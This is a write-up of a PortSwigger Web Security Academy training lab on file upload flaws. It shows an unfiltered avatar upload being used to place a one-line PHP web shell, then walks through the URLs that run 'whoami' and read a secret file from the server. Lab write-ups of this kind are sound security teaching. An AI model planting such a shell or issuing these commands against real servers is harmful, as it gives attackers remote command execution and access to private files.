Skip to content
Field Detail
Platform PortSwigger Web Security Academy
Type File Upload Vulnerabilities
Difficulty Apprentice
Objective Upload a PHP web shell to the server and use it to read /home/carlos/secret

Remote Code Execution via Web Shell Upload

I logged in as wiener:peter and found an avatar upload function on the account page with no content-type restrictions, no extension filtering, and no mention of allowed file types.

Screenshot

I uploaded a minimal PHP command shell as tetoshell.php:

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>
Screenshot
Screenshot
The file avatars/tetoshell.php has been uploaded.

No validation — the file landed at /files/avatars/tetoshell.php in a web-accessible directory served by the PHP interpreter. The upload path matters as much as the upload itself: a non-web-accessible directory, or a server that doesn't pass .php files to the interpreter, would break the attack.

Confirming RCE:

/files/avatars/tetoshell.php?cmd=whoami
Screenshot

Returns carlos. Reading the secret:

/files/avatars/tetoshell.php?cmd=cat%20/home/carlos/secret
Screenshot

File contents returned directly in the response. Submitting the secret:

Screenshot
Screenshot

And lab solved

Resources